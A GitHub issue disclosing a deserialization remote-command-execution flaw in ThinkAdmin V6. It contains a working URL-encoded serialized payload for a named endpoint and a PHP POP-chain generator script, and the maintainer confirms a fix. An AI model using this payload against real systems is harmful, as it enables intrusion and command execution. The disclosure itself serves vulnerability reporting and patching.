search

zoujingli / ThinkAdmin

基于 ThinkPHP6 的极简后台管理系统,内置注解权限、异步多任务、应用插件生态等,支持类 PaaS 更新公共模块和应用插件,插件可本地化定制开发。
https://thinkadmin.top
MIT License
2.19k stars 838 forks source link

Deserialization vulnerability in thinkadmin V6 #269

Closed J0o1ey closed 2 years ago

J0o1ey commented 2 years ago

A deserialization vulnerability was found in thinkadmin V6,this vuln can cause Remote Command Execute

The deserialization vulnerability affects all versions from November 1, 2019 to June 16, 2020

POC:

POST Data to this url **http://host/admin/login.html?s=admin/api.Update/tree

this POC will execute command whoami

rules=a%3A2%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A11%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A13%3A%22%00%2A%00connection%22%3Bs%3A5%3A%22mysql%22%3Bs%3A7%3A%22%00%2A%00name%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A11%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A13%3A%22%00%2A%00connection%22%3Bs%3A5%3A%22mysql%22%3Bs%3A7%3A%22%00%2A%00name%22%3Bs%3A0%3A%22%22%3Bs%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A9%3A%22%00%2A%00hidden%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A3%3A%22123%22%3B%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00field%22%3Ba%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00schema%22%3Ba%3A0%3A%7B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A9%3A%22%00%2A%00hidden%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A3%3A%22123%22%3B%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00field%22%3Ba%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00schema%22%3Ba%3A0%3A%7B%7D%7Di%3A1%3Bi%3A123%3B%7D

72C00AD9-FE4F-4F67-858A-2A5B6249676E

POP Chain are as followed

Hacker can use this script to generate deserialization data to achive Remote code execute

<?php

namespace think;

use think\model\Pivot;

abstract class Model{

  private $lazySave = false;   # save()

  private $exists = false;   # updateData()

  protected $connection;

  protected $name;       # __toString() Conversion.php =>Pivot

  private $withAttr = [];     # assert

  protected $hidden = [];

  private $data = [];

  protected $withEvent = false;

  private $force = false;

  protected $field = [];

  protected $schema = [];

  function __construct(){

    $this->lazySave = true;

    $this->exists = true;

    $this->withEvent = false;

    $this->force = true;

    $this->connection = "mysql";

    $this->withAttr = ["test"=>"system"];

    $this->data = ["test"=>"whoami"];

    $this->hidden = ["test"=>"123"];

    $this->field = [];

    $this->schema = [];

  }

}

namespace think\model;

use think\Model;

class Pivot extends Model{

  function __construct($obj=""){

    parent::__construct();

    $this->name = $obj;     

  }

}

$a=new Pivot();

echo urlencode(serialize([new Pivot($a),123]));?>
zoujingli commented 2 years ago

Released vulnerability update.

zoujingli commented 2 years ago

https://www.oschina.net/news/120433

leewei233 commented 2 years ago

这是来自QQ邮箱的假期自动回复邮件。   您好,来信收到             

leewei233 commented 2 years ago

这是来自QQ邮箱的假期自动回复邮件。   您好,来信收到